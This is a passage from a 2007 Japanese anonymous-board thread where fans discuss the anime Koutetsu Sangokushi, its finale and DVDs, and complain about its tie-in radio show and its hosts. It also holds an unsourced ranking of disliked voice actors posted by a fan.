未だにCMがずっと鋼鉄のターンだったりすると興奮するw

105 :名無しさん@お腹いっぱい。:2007/11/02(金) 12:13:25 ID:Qz+CskpA
鋼鉄のCM見るともうやめて〜って思うがニヤニヤが止まらんw


106 :名無しさん@お腹いっぱい。:2007/11/04(日) 06:52:41 ID:rJ0ojFba
あれか、臭い靴下を嗅ぐのがやめられない感じ?

107 :名無しさん@お腹いっぱい。:2007/11/04(日) 23:44:30 ID:pWsb4H5i
NHK総合
人形劇三国志きた^^

108 :名無しさん@お腹いっぱい。:2007/11/05(月) 14:03:11 ID:CpoClDt5
呉好きなんで、孫堅の荒々しい若年期から描いてほしかった・・・

109 :名無しさん@お腹いっぱい。:2007/11/08(木) 23:19:46 ID:CnRjXHjq
劉備ファンとしてはあのピンクアフロはやめて欲しかった。
でもそれ以上に陸遜がうざすぎた

110 :名無しさん@お腹いっぱい。:2007/11/09(金) 17:53:50 ID:cmVLWkiS
孫権が劉備に会見した時、「自分たちがいれば曹操なんて」とか言っていたが
曹操に負けて這う這うの体で孫権に頼ってきてんのに何をぬかしてんだ
この分裂症がと思ったな。 騎兵の層が薄い孫呉だからって偉そうにすんな!

111 :名無しさん@お腹いっぱい。:2007/11/09(金) 18:44:02 ID:TIvsppz6
池沼のピンクアフロ餓鬼の言うことを真に受けた時点で孫権の負け

112 :名無しさん@お腹いっぱい。:2007/11/10(土) 21:55:36 ID:krdFDPZv
ようやく最終回までたどり着いた…

三国志のくくりいらないじゃん
玉璽に選ばれし者が個人的な理由で「こんなものいらない」なのは
逆にお陸っぽいからまあいいやw
玉璽が無くなった世界で今後同じような災厄が訪れたらどうするんだろ、
という気はするが

113 :名無しさん@お腹いっぱい。:2007/11/10(土) 23:07:46 ID:RSzPipGA
玉璽なくなったから、玉璽への欲に溺れて荒れる世界はとりあえずもうないだろう。
そういう意味では、後世は心配ないと思う。
今度は玉璽に頼らない群雄割拠の時代が訪れるのは目に見えてるけどw
アフロもそうだけど、孔明もどうにかして欲しかったな。
最終回まであの気持ち悪さで、ラストで実は良い人でしたの取ってつけようは無理あるってw
こんなんなら何かが憑依してまったく別人格でしたのほうが、なんぼかマシだった。

114 :名無しさん@お腹いっぱい。:2007/11/12(月) 03:25:18 ID:KSaSMH0M
これはホモ漫画なんだ…

115 :名無しさん@お腹いっぱい。:2007/11/12(月) 16:30:37 ID:sPj9XRqu
ガチだけど直接的ではないな

116 :名無しさん@お腹いっぱい。:2007/11/16(金) 11:35:11 ID:UkDOEFT8
結局趙雲がどうなったかは語られないのか?

117 :名無しさん@お腹いっぱい。:2007/11/16(金) 18:26:46 ID:f1/frJ+2
なんとなく小ずるく生き延びてるんじゃないの

118 :名無しさん@お腹いっぱい。:2007/11/16(金) 18:57:09 ID:uk10q5hw
それこそDVD26話でさりげなく出てきたりして。
アニメイトによれば6巻のトレカは趙雲と魯粛らしいけど
表紙は違うだろうな
この二人には孔明シンパ以外の関係性がないし
誰になるか気になる

119 :名無しさん@お腹いっぱい。:2007/11/17(土) 11:21:40 ID:lnU1DrmW
あーそういや趙雲の晩年の事跡に、姜維を引き立てるって役目が演義じゃあったわな。

120 :名無しさん@お腹いっぱい。:2007/11/17(土) 22:46:11 ID:gx1g9QM5
このアニメの着うたがとれる携帯サイト教えてください。なかなかみつからない…

121 :名無しさん@お腹いっぱい。:2007/11/17(土) 23:56:14 ID:tLDikMg9
コナミ

122 :名無しさん@お腹いっぱい。:2007/11/18(日) 03:53:07 ID:mEnS40Te
ラジオについに生天目さんが来ていた。
来るなら来ると、予告しとけってんだ愚図(してたかも知れないけど)
しかし内容の方はあまりに酷く、思わず夜食中で握っていた箸をへし折ってしまった・・
それでも聞いちゃうんだからこっちも業が深いけどな

もしらじお伝に、空気読めず二人を叱るメールがあったら私の物だと思ってくれ。
遊佐、トーク時の声キモイよ

123 :名無しさん@お腹いっぱい。:2007/11/18(日) 06:12:38 ID:FIbJ02Kl
ラジオってまだやってたのか

124 :名無しさん@お腹いっぱい。:2007/11/18(日) 09:31:25 ID:N8gYGBmk
http://celebrity-obituary.com/Ricardo-Villalobos-dies-in-car-accident-aged-37/

125 :名無しさん@お腹いっぱい。:2007/11/18(日) 17:22:24 ID:EUo8wGA1
>>122
先週のラジオで来ると言ってた気がしますが…
内容が酷いというのには同意。


126 :名無しさん@お腹いっぱい。:2007/11/18(日) 21:47:25 ID:uedjH2k+
と゜んな内容だったの

127 :名無しさん@お腹いっぱい。:2007/11/19(月) 00:31:02 ID:F7m1rubO
>>126
遊佐の進行がgdgdでした

128 :名無しさん@お腹いっぱい。:2007/11/19(月) 08:53:55 ID:gzDoGqim
>127 それはいつもの事。その事自体で何やかやは言わん。今更。

>126 どこから言えばいいのか判らないぐらい酷いです。
孫権役の仁美さんがイベントに出られないのは当然だとか、
孫権は何もしてないとか、諸葛瑾は眼鏡割られてるんだぞとか逆ギレしたりとか、
仁美さんが一番三国志詳しいからハブったとか、三国志に詳しい奴がいるとうるさいとか、

今回に限らなければ、孫子の兵法というコーナーがあった時は
毎回のように「まあ三国志となんら関係ありませんが」と言い募っていて、
そしてちょっと前にリニューアルしたんだけど
その初回に「三国志をオミットしていく」とかコメントしてるんだけど
その後にいけしゃあしゃあと「このラジオを聴いていれば三国志を学べるので
受験は大丈夫です」とか言ってたり、
女性の下着の脱がせかたのメールを何度と無く取り上げて
それについて変に盛り上がってたりと
思い出した事を羅列していくだけで腹が立って仕方ないほど本当に酷い! 
遊佐、お前なんて既婚だろが!

遊佐ってこのラジオ聞くまで名前も知らなかったんだけど、大嫌いになりましたよ。
いっそ終わってくれれば開放されるのに、続いてるから確認してしまって
また酷い事やってやがるとそのつど腹を立ててしまう・・・
頼むから少しは勉強して面白くしてくれ! ガンダムやライダーに出て調子こいてんじゃねえぞ!
(どっちも観てないが)

129 :名無しさん@お腹いっぱい。:2007/11/19(月) 17:36:38 ID:eF+kMTUW
>>28
ラジオ聞いてないからどういうノリなのかわからないけど
文面だけ見るとひどいな

130 :名無しさん@お腹いっぱい。:2007/11/22(木) 21:40:03 ID:OPR7A6t5
DVD、三木さんが気の利いたこと言ってたのがとても良かった
大人組だけでコメンタリーやってくれないかなぁ
太史慈ネタそろそろ引っ張りすぎ

131 :名無しさん@お腹いっぱい。:2007/11/22(木) 21:47:30 ID:H4H04Fbs
あんな内容のないラジオ聴かなきゃいいのに

132 :名無しさん@お腹いっぱい。:2007/11/23(金) 22:23:36 ID:cJHx28cB
私だって、聞きたくありませんよ!

それというのも、三国志と名に冠してさえいなければ・・・

133 :名無しさん@お腹いっぱい。:2007/11/24(土) 19:39:18 ID:AQSLCAZ/
>>132
あれ、前にも何度かラジオの話題出してた人だよね?
生天目さんファンだから聞いてんのかと思ってた

134 :名無しさん@お腹いっぱい。:2007/11/24(土) 23:57:27 ID:1vCa21na
割と感動した孫権と張昭が互いを讃え合う場面だけど
出演者は内心「ろくに活躍もしてない老いぼれが何か言ってるよ」とか
思ってたのかなあ?

せめて脚本家や監督くらいは本気で作ってたと思いたいよ。

135 :名無しさん@お腹いっぱい。:2007/11/25(日) 06:34:21 ID:HSi9otfc
>>134
そんな事ありえないだろ
あのシーンがあった意味がなくなるじゃないか

136 :名無しさん@お腹いっぱい。:2007/11/27(火) 12:12:24 ID:izBrIVHc
●ファンが選ぶ「嫌いな男性声優」2007年度版
※(数字)は昨年のランキング
1位 高橋直純(2)
2位 小野坂昌也(1)
3位 杉田智和(4)
4位 谷山紀章(8)
5位 櫻井孝宏(3)
6位 森田成一(6)
7位 柿原徹也(圏外)
8位 保志総一朗(11)
9位 石田彰(5)
10位 岩田光央(10)
11位 宮田幸季(圏外)
12位 関智一(14)
13位 子安武人(16)
14位 諏訪部順一(13)
15位 福山潤(15)
16位 森久保祥太郎(圏外)
17位 宮野真守(圏外)
18位 三木眞一郎(17)
19位 山寺宏一(20)
20位 山口勝平(18)


137 :名無しさん@お腹いっぱい。:2007/11/27(火) 12:20:16 ID:9BOOfD6b
ファンが選ぶ嫌いって変じゃない?w

138 :名無しさん@お腹いっぱい。:2007/11/27(火) 16:36:38 ID:pgh6JaY9
確かにww
つーかそんなの何処で統計とってるんだろう

139 :名無しさん@お腹いっぱい。:2007/11/27(火) 16:40:22 ID:ERT7xumd
>136 ま、概ね同意できる結果ではありますな。
諏訪部は鬼太郎でのEDを評価したいけど。
でも鈴村が入ってないのは変じゃない? 遊佐は嫌いだけどあんまり売れてないし、
関の俊彦の方も悪い評判の方が上回るような感じでもないから入ってないのは納得。

140 :名無しさん@お腹いっぱい。:2007/11/27(火) 18:04:52 ID:SEiroU2A
つかスレ違いですな

141 :名無しさん@お腹いっぱい。:2007/11/27(火) 23:49:11 ID:em8YRBTj
三国志への知識、興味でランキング取ったらどうなるか知りたい
そんでその人たちでやり直して欲しい

徐庶が好きな生天目さん、曹操が好きな後藤邑子は割かしだろうな
杉田や友樹じゃない方の小野は大戦厨だから微妙。

ふう、我ながら声ヲタ兼歴史ヲタとはまた厄介な性癖だ。

142 :名無しさん@お腹いっぱい。:2007/12/01(土) 21:34:21 ID:FMO5HQ3S
まだDVD6巻ジャケ来ないのかな

143 :名無しさん@お腹いっぱい。:2007/12/04(火) 02:07:35 ID:Gnzpk0Gj
明日はいよいよベストアルバムの発売だ。ドラマCD3枚持ってるが、イベントDVD面白そうだ。

39 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)